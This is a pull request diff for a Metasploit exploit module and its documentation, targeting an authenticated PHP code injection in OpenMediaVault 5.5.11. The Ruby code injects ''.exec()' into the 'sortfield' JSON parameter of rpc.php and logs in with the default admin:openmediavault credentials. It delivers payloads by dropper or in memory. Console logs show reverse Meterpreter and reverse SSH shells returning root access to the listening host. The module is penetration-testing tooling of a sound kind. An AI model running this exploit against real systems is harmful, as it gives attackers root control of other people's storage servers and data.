### PR TITLE
OpenMediaVault 5.5.11 Authenticated Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
+++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
@@ -1,0 +1,95 @@
+## Vulnerable Application
+
+### Description
+
+  This module exploits an authenticated PHP code injection
+  vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 
+  inclusive in the "sortfield" POST parameter of "rpc.php" page, 
+  because json_encode_safe is not used in config/databasebackend.inc. 
+  Successful exploitation allows arbitrary command execution 
+  on the underlying operating system as root.
+
+
+### Installation And Setup
+
+  1. Download the version 5.5.11 of OpenMediaVault (i.e. [openmediavault_5.5.11-amd64.iso ISO](https://deac-ams.dl.sourceforge.net/project/openmediavault/5.5.11/openmediavault_5.5.11-amd64.iso)).
+  2. Set up a new Debian machine in VirtualBox or VMWare and load the ISO. 
+  Follow the install prompts and note the `root` password you choose to use. 
+  Once the installation is finished, press `<Enter>` to reboot the server.
+  3. Log into via the terminal using the username `root` and the password 
+  you set for the `root` user during installation.
+  4. On the shell and run the command `ip a` to get the current IP address.
+  5. Take the IP address and browse to the URL http://*IP ADDRESS*/, then log in
+  with the default administrative credentials (`admin`:`openmediavault`).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### OpenMediaVault 5.5.11
+```
+msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options
+
+Module options (exploit/unix/webapp/openmediavault_rpc_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  openmediavault   yes       Password to login with
+   HttpUsername  admin            yes       User to login with
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT         80               yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Linux Dropper)
+
+
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
+rhosts => 192.168.56.108
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
+lhost => 192.168.56.105
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.56.105:4444
+[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
+[+] 192.168.56.108:80 - Authenticated successfully.
+[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
+[*] 192.168.56.108:80 - Sending payload (150 bytes)...
+[*] Sending stage (976712 bytes) to 192.168.56.108
+[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : 192.168.56.108
+OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > shell
+Process 1499 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+```

--- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
+++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
@@ -3,21 +3,21 @@
 ### Description
 
   This module exploits an authenticated PHP code injection
-  vulnerability found in openmediavault versions before 4.1.36 
-  and 5.x versions before 5.5.12 inclusive in the `sortfield` 
-  POST parameter of the `rpc.php` page, because `json_encode_safe()` 
-  is not used in config/databasebackend.inc.
-  Successful exploitation grants attackers to perform arbitrary 
-  command execution on the underlying operating system as root.
+  vulnerability found in openmediavault versions before 4.1.36
+  and 5.x versions before 5.5.12 inclusive in the `sortfield`
+  POST parameter of the `rpc.php` page, because `json_encode_safe()`
+  is not used in `config/databasebackend.inc`.
+  Successful exploitation grants attackers the ability to execute
+  arbitrary commands on the underlying operating system as root.
 
 
 ### Installation And Setup
 
   1. Download version 5.5.11 of OpenMediaVault (i.e. [openmediavault_5.5.11-amd64.iso ISO](https://deac-ams.dl.sourceforge.net/project/openmediavault/5.5.11/openmediavault_5.5.11-amd64.iso)).
-  2. Set up a new Debian machine in VirtualBox or VMWare and load the ISO. 
-  Follow the install prompts and note the `root` password you choose to use. 
+  2. Set up a new Debian machine in VirtualBox or VMWare and load the ISO.
+  Follow the install prompts and note the `root` password you choose to use.
   Once the installation is finished, press `<Enter>` to reboot the server.
-  3. Log into via the terminal using the username `root` and the password 
+  3. Log into via the terminal using the username `root` and the password
   you set for the `root` user during installation.
   4. On the shell and run the command `ip a` to get the current IP address.
   5. Take the IP address and browse to the URL http://*IP ADDRESS*/, then log in
@@ -34,7 +34,7 @@
   The username for OpenMediaVault
 
   **PASSWORD**
-  
+
   The password for OpenMediaVault
 
 ## Verification Steps
@@ -43,10 +43,65 @@ Follow [Setup](#setup) and [Scenarios](#scenarios).
 
 ## Scenarios
 
-### OpenMediaVault 5.5.11
+### OpenMediaVault 5.5.11 With Linux Dropper Payload
 ```
 msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set RHOSTS 172.29.90.121
+RHOSTS => 172.29.90.121
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set LHOST 172.29.95.98
+LHOST => 172.29.95.98
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit
+
+[*] Started reverse TCP handler on 172.29.95.98:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] 172.29.90.121:80 - Authenticating with OpenMediaVault using admin:openmediavault...
+[+] 172.29.90.121:80 - Successfully authenticated with OpenMediaVault using admin:openmediavault.
+[*] 172.29.90.121:80 - Trying to detect if target is running a supported version of OpenMediaVault.
+[+] 172.29.90.121:80 - Identified OpenMediaVault version 5.5.11.
+[*] 172.29.90.121:80 - Verifying remote code execution by attempting to execute 'usleep()'.
+[+] 172.29.90.121:80 - Response received after 9 seconds.
+[+] The target is vulnerable.
+[*] 172.29.90.121:80 - Sending payload (150 bytes)...
+[*] Sending stage (976712 bytes) to 172.29.90.121
+[*] Meterpreter session 1 opened (172.29.95.98:4444 -> 172.29.90.121:59890) at 2020-11-09 11:26:22 -0600
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : openmediavault.local
+OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > getuid
+Server username: root @ openmediavault (uid=0, gid=0, euid=0, egid=0)
+meterpreter > getwd
+/
+meterpreter > shell
+Process 930 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux openmediavault 5.7.0-0.bpo.2-amd64 #1 SMP Debian 5.7.10-1~bpo10+1 (2020-07-30) x86_64 GNU/Linux
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.29.90.121 - Meterpreter session 1 closed.  Reason: User exit
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) >
+```
+
+### OpenMediaVault 5.5.11 With Unix In-Memory Payload
+```
+msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set RHOSTS 172.29.90.121
+RHOSTS => 172.29.90.121
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set LHOST 172.29.95.98
+LHOST => 172.29.95.98
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set TARGET 1
+TARGET => 1
 msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options
 
 Module options (exploit/unix/webapp/openmediavault_rpc_rce):
@@ -55,7 +110,7 @@ Module options (exploit/unix/webapp/openmediavault_rpc_rce):
    ----       ---------------  --------  -----------
    PASSWORD   openmediavault   yes       The OpenMediaVault password to authenticate with
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RHOSTS     172.29.90.121    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT      80               yes       The target port (TCP)
    SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
    SRVPORT    8080             yes       The local port to listen on.
@@ -67,46 +122,43 @@ Module options (exploit/unix/webapp/openmediavault_rpc_rce):
    VHOST                       no        HTTP server virtual host
 
 
-Payload options (linux/x86/meterpreter/reverse_tcp):
+Payload options (cmd/unix/reverse_ssh):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST                   yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
+   LHOST  172.29.95.98     yes       The listen address (an interface may be specified)
+   LPORT  22               yes       The listen port
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Automatic (Linux Dropper)
+   1   Automatic (Unix In-Memory)
 
 
-msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
-rhosts => 192.168.56.108
-msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
-lhost => 192.168.56.105
-msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set LPORT 9988
+LPORT => 9988
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > run
 
-[*] Started reverse TCP handler on 192.168.56.105:4444
-[*] 192.168.56.108:80 - Authenticating with OpenMediaVault using admin:openmediavault...
-[+] 192.168.56.108:80 - Successfully authenticated with OpenMediaVault.
-[*] 192.168.56.108:80 - Trying to detect if target is running a supported version of OpenMediaVault.
-[+] 192.168.56.108:80 - Identified OpenMediaVault version 5.5.11.
-[*] 192.168.56.108:80 - Sending payload (150 bytes)...
-[*] Sending stage (976712 bytes) to 192.168.56.108
-[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
-[*] Command Stager progress - 100.00% done (799/799 bytes)
+[*] Started SSH reverse handler on ssh://172.29.95.98:9988
+[*] Executing automatic check (disable AutoCheck to override)
+[*] 172.29.90.121:80 - Authenticating with OpenMediaVault using admin:openmediavault...
+[+] 172.29.90.121:80 - Successfully authenticated with OpenMediaVault using admin:openmediavault.
+[*] 172.29.90.121:80 - Trying to detect if target is running a supported version of OpenMediaVault.
+[+] 172.29.90.121:80 - Identified OpenMediaVault version 5.5.11.
+[*] 172.29.90.121:80 - Verifying remote code execution by attempting to execute 'usleep()'.
+[+] 172.29.90.121:80 - Response received after 6 seconds.
+[+] The target is vulnerable.
+[*] 172.29.90.121:80 - Sending payload (158 bytes)...
+[*] SSH command shell session 2 opened (127.0.0.1 -> 127.0.0.1) at 2020-11-09 11:28:39 -0600
 
-meterpreter > sysinfo
-Computer     : 192.168.56.108
-OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
-Architecture : x64
-BuildTuple   : i486-linux-musl
-Meterpreter  : x86/linux
-meterpreter > shell
-Process 1499 created.
-Channel 1 created.
 id
 uid=0(root) gid=0(root) groups=0(root)
+whoami
+root
+uname -a
+Linux openmediavault 5.7.0-0.bpo.2-amd64 #1 SMP Debian 5.7.10-1~bpo10+1 (2020-07-30) x86_64 GNU/Linux
+pwd
+/
 ```

--- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
+++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
@@ -36,19 +36,20 @@ msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options
 
 Module options (exploit/unix/webapp/openmediavault_rpc_rce):
 
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  openmediavault   yes       Password to login with
-   HttpUsername  admin            yes       User to login with
-   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT         80               yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
-   URIPATH                        no        The URI to use for this exploit (default is random)
-   VHOST                          no        HTTP server virtual host
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   openmediavault   yes       The OpenMediaVault password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The URI path of the OpenMediaVault installation
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   admin            yes       The OpenMediaVault username to authenticate with
+   VHOST                       no        HTTP server virtual host
 
 
 Payload options (linux/x86/meterpreter/reverse_tcp):
@@ -73,7 +74,7 @@ lhost => 192.168.56.105
 msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.56.105:4444
-[*] 192.168.56.108:80 - Authenticating with OpenMediaVault using "admin:openmediavault"...
+[*] 192.168.56.108:80 - Authenticating with OpenMediaVault using admin:openmediavault...
 [+] 192.168.56.108:80 - Successfully authenticated with OpenMediaVault.
 [*] 192.168.56.108:80 - Trying to detect if target is running a supported version of OpenMediaVault.
 [+] 192.168.56.108:80 - Identified OpenMediaVault version 5.5.11.

--- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
+++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
@@ -73,9 +73,10 @@ lhost => 192.168.56.105
 msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.56.105:4444
-[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
-[+] 192.168.56.108:80 - Authenticated successfully.
-[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
+[*] 192.168.56.108:80 - Authenticating with OpenMediaVault using "admin:openmediavault"...
+[+] 192.168.56.108:80 - Successfully authenticated with OpenMediaVault.
+[*] 192.168.56.108:80 - Trying to detect if target is running a supported version of OpenMediaVault.
+[+] 192.168.56.108:80 - Identified OpenMediaVault version 5.5.11.
 [*] 192.168.56.108:80 - Sending payload (150 bytes)...
 [*] Sending stage (976712 bytes) to 192.168.56.108
 [*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400

--- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
+++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
@@ -25,10 +25,16 @@
 
 ## Options
 
+  **TARGETURI**
+
+  The URI path for OpenMediaVault installation
+
   **USERNAME**
+
   The username for OpenMediaVault
 
   **PASSWORD**
+  
   The password for OpenMediaVault
 
 ## Verification Steps

--- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
+++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
@@ -3,16 +3,17 @@
 ### Description
 
   This module exploits an authenticated PHP code injection
-  vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 
-  inclusive in the "sortfield" POST parameter of "rpc.php" page, 
-  because json_encode_safe is not used in config/databasebackend.inc. 
-  Successful exploitation allows arbitrary command execution 
-  on the underlying operating system as root.
+  vulnerability found in openmediavault versions before 4.1.36 
+  and 5.x versions before 5.5.12 inclusive in the `sortfield` 
+  POST parameter of the `rpc.php` page, because `json_encode_safe()` 
+  is not used in config/databasebackend.inc.
+  Successful exploitation grants attackers to perform arbitrary 
+  command execution on the underlying operating system as root.
 
 
 ### Installation And Setup
 
-  1. Download the version 5.5.11 of OpenMediaVault (i.e. [openmediavault_5.5.11-amd64.iso ISO](https://deac-ams.dl.sourceforge.net/project/openmediavault/5.5.11/openmediavault_5.5.11-amd64.iso)).
+  1. Download version 5.5.11 of OpenMediaVault (i.e. [openmediavault_5.5.11-amd64.iso ISO](https://deac-ams.dl.sourceforge.net/project/openmediavault/5.5.11/openmediavault_5.5.11-amd64.iso)).
   2. Set up a new Debian machine in VirtualBox or VMWare and load the ISO. 
   Follow the install prompts and note the `root` password you choose to use. 
   Once the installation is finished, press `<Enter>` to reboot the server.
@@ -21,6 +22,14 @@
   4. On the shell and run the command `ip a` to get the current IP address.
   5. Take the IP address and browse to the URL http://*IP ADDRESS*/, then log in
   with the default administrative credentials (`admin`:`openmediavault`).
+
+## Options
+
+  **USERNAME**
+  The username for OpenMediaVault
+
+  **PASSWORD**
+  The password for OpenMediaVault
 
 ## Verification Steps
 

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
   rescue ::Rex::ConnectionError
-    print_error('Rex::ConnectionError caught in check(), could not connect to the target.')
+    print_error('Rex::ConnectionError caught in exploit(), could not connect to the target.')
     return false
   end
 end

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -69,36 +69,9 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['HttpPassword']
   end
 
-  def get_target(_opts = {})
-    res = send_request_cgi({
-      'uri' => @uri,
-      'method' => 'POST',
-      'cookie' => @cookie.to_s,
-      'data' => {
-        "service": 'System',
-        "method": 'getInformation',
-        "params": nil,
-        "options": {
-          "updatelastaccess": false
-        }
-      }.to_json
-    })
-    version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
-    if version.nil?
-      print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
-      return nil
-    end
-    print_good("#{peer} - OpenMediaVault version #{version} identified.")
-    if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
-      return nil
-    end
-
-    return version
-  end
-
   def login(user, pass, _opts = {})
+    print_status("#{peer} - Authenticating with OpenMediaVault using \"#{user}:#{pass}\"...")
     @uri = normalize_uri(target_uri.path, '/rpc.php')
-    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
     res = send_request_cgi({
       'uri' => @uri,
       'method' => 'POST',
@@ -119,18 +92,43 @@ class MetasploitModule < Msf::Exploit::Remote
       return nil
     end
 
-    if res.code == 200
-      print_good("#{peer} - Authenticated successfully.")
+    if res.code == 200 && res.body.scan('"authenticated":true,').flatten.first && res.get_cookies.scan(/X-OPENMEDIAVAULT-SESSIONID=(\w+);*/).flatten.first
+      print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
       @cookie = res.get_cookies
-    elsif res.code == 401
-      print_error("#{peer} - Authentication failed.")
-    else
-      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
+      return res
     end
-    return res
+    fail_with(Failure::NoAccess, 'Failed to authenticate with OpenMediaVault.')
   rescue ::Rex::ConnectionError
     print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
     return nil
+  end
+
+  def get_target(_opts = {})
+    print_status("#{peer} - Trying to detect if target is running a supported version of OpenMediaVault.")
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => @cookie.to_s,
+      'data' => {
+        "service": 'System',
+        "method": 'getInformation',
+        "params": nil,
+        "options": {
+          "updatelastaccess": false
+        }
+      }.to_json
+    })
+    version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+    if version.nil?
+      print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
+      return nil
+    end
+    print_good("#{peer} - Identified OpenMediaVault version #{version}.")
+    if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
+      return nil
+    end
+
+    return version
   end
 
   def execute_command(cmd, _opts = {})
@@ -161,32 +159,30 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
     end
 
-    if res.code == 200
-      version = get_target
-      if version.nil?
-        # We don't print out an error message here as returning this will
-        # automatically cause Metasploit to print out an appropriate error message.
-        return CheckCode::Safe
-      end
-
-      delay = rand(7...15)
-      cmd = "\").usleep(#{delay}0000).(\""
-      print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
-      t1 = Time.now.to_i
-      res = execute_command(cmd)
-      t2 = Time.now.to_i
-      unless res
-        print_error("#{peer} - Connection failed whilst trying to perform the code injection.")
-        return CheckCode::Detected
-      end
-      diff = t2 - t1
-      if diff >= 3
-        print_good("#{peer} - Response received after #{diff} seconds.")
-        return CheckCode::Vulnerable
-      end
-      print_error("#{peer} - Response wasn't received within the expected period of time.")
+    version = get_target
+    if version.nil?
+      # We don't print out an error message here as returning this will
+      # automatically cause Metasploit to print out an appropriate error message.
       return CheckCode::Safe
     end
+
+    delay = rand(7...15)
+    cmd = "\").usleep(#{delay}0000).(\""
+    print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
+    t1 = Time.now.to_i
+    res = execute_command(cmd)
+    t2 = Time.now.to_i
+    unless res
+      print_error("#{peer} - Connection failed whilst trying to perform the code injection.")
+      return CheckCode::Detected
+    end
+    diff = t2 - t1
+    if diff >= 3
+      print_good("#{peer} - Response received after #{diff} seconds.")
+      return CheckCode::Vulnerable
+    end
+    print_error("#{peer} - Response wasn't received within the expected period of time.")
+    return CheckCode::Safe
   rescue ::Rex::ConnectionError
     print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
     return CheckCode::Unknown
@@ -195,24 +191,26 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     res = login(user, pass)
     unless res
-      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
+      return CheckCode::Unknown("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
     end
-    if res.code == 200
-      version = get_target
-      if version.nil?
-        print_error("#{peer} - The target is not vulnerable.")
-        return false
-      end
-      print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
-      case target['Type']
-      when :unix_memory
-        execute_command(payload.encoded)
-      when :linux_dropper
-        execute_cmdstager(linemax: 130_000)
-      end
+
+    version = get_target
+    if version.nil?
+      # We don't print out an error message here as returning this will
+      # automatically cause Metasploit to print out an appropriate error message.
+      return CheckCode::Safe
+    end
+
+    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(linemax: 130_000)
     end
   rescue ::Rex::ConnectionError
     print_error('Rex::ConnectionError caught in exploit(), could not connect to the target.')
     return false
   end
+
 end

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Payload' => { 'BadChars' => "\x00" },
-        'DisclosureDate' => 'Sept 28 2020',
+        'DisclosureDate' => 'Sep 28 2020',
         'Targets' =>
           [
             [

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Automatic (Unix In-Memory)',
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_ssh' },
               'Type' => :unix_memory
             ]
           ],

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -93,11 +93,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if res.code == 200 && res.body.scan('"authenticated":true,').flatten.first && res.get_cookies.scan(/X-OPENMEDIAVAULT-SESSIONID=(\w+);*/).flatten.first
-      print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
       @cookie = res.get_cookies
-      return res
     end
-    fail_with(Failure::NoAccess, 'Failed to authenticate with OpenMediaVault.')
+    return res
   rescue ::Rex::ConnectionError
     print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
     return nil
@@ -159,6 +157,12 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
     end
 
+    if @cookie.nil?
+      vprint_error("#{peer} - Failed to authenticate with OpenMediaVault.")
+      return Exploit::CheckCode::Unknown
+    else
+      vprint_good("#{peer} - Successfully authenticated with OpenMediaVault.")
+    end
     version = get_target
     if version.nil?
       # We don't print out an error message here as returning this will
@@ -168,23 +172,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
     delay = rand(7...15)
     cmd = "\").usleep(#{delay}0000).(\""
-    print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
+    vprint_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
     t1 = Time.now.to_i
     res = execute_command(cmd)
     t2 = Time.now.to_i
     unless res
-      print_error("#{peer} - Connection failed whilst trying to perform the code injection.")
+      vprint_error("#{peer} - Connection failed whilst trying to perform the code injection.")
       return CheckCode::Detected
     end
     diff = t2 - t1
     if diff >= 3
-      print_good("#{peer} - Response received after #{diff} seconds.")
+      vprint_good("#{peer} - Response received after #{diff} seconds.")
       return CheckCode::Vulnerable
     end
-    print_error("#{peer} - Response wasn't received within the expected period of time.")
+    vprint_error("#{peer} - Response wasn't received within the expected period of time.")
     return CheckCode::Safe
   rescue ::Rex::ConnectionError
-    print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
+    vprint_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
     return CheckCode::Unknown
   end
 
@@ -194,6 +198,12 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, 'Authentication failed')
     end
 
+    if @cookie.nil?
+      print_error("#{peer} - Failed to authenticate with OpenMediaVault.")
+      return false
+    else
+      print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
+    end
     version = get_target
     if version.nil?
       # We don't print out an error message here as returning this will

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -75,11 +75,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'cookie' => @cookie.to_s,
       'data' => {
-        "service": "System",
-        "method": "getInformation",
+        "service": 'System',
+        "method": 'getInformation',
         "params": nil,
         "options": {
-          "updatelastaccess":false
+          "updatelastaccess": false
         }
       }.to_json
     })
@@ -102,16 +102,16 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'uri' => @uri,
       'method' => 'POST',
-      'data' => "{
-        \"service\":\"Session\",
-        \"method\":\"login\",
-        \"params\":{
-          \"username\":\"#{user}\",
-          \"password\":\"#{pass}\"
+      'ctype' => 'application/json',
+      'data' => {
+        "service": 'Session',
+        "method": 'login',
+        "params": {
+          "username": user.to_s,
+          "password": pass.to_s
         },
-        \"options\":null
-      }",
-      'ctype' => 'application/json'
+        "options": nil
+      }.to_json
     })
     unless res
       # We return nil here, as callers should handle this case
@@ -138,18 +138,18 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => @uri,
       'method' => 'POST',
       'cookie' => @cookie.to_s,
-      'data' => "{
-          \"service\":\"LogFile\",
-          \"method\":\"getList\",
-          \"params\":{
-          \"id\":\"apt_history\",
-          \"start\":0,
-          \"limit\":50,
-          \"sortfield\":\"'.exec(\\\"#{cmd}\\\").'\",
-          \"sortdir\":\"DESC\"
+      'data' => {
+        "service": 'LogFile',
+        "method": 'getList',
+        "params": {
+          "id": 'apt_history',
+          "start": 0,
+          "limit": 50,
+          "sortfield": "'.exec(\"#{cmd}\").'",
+          "sortdir": 'DESC'
         },
-        \"options\":null
-      }"
+        "options": nil
+      }.to_json
     })
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, 'Connection failed.')
@@ -160,6 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res
       return CheckCode::Unknown("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
     end
+
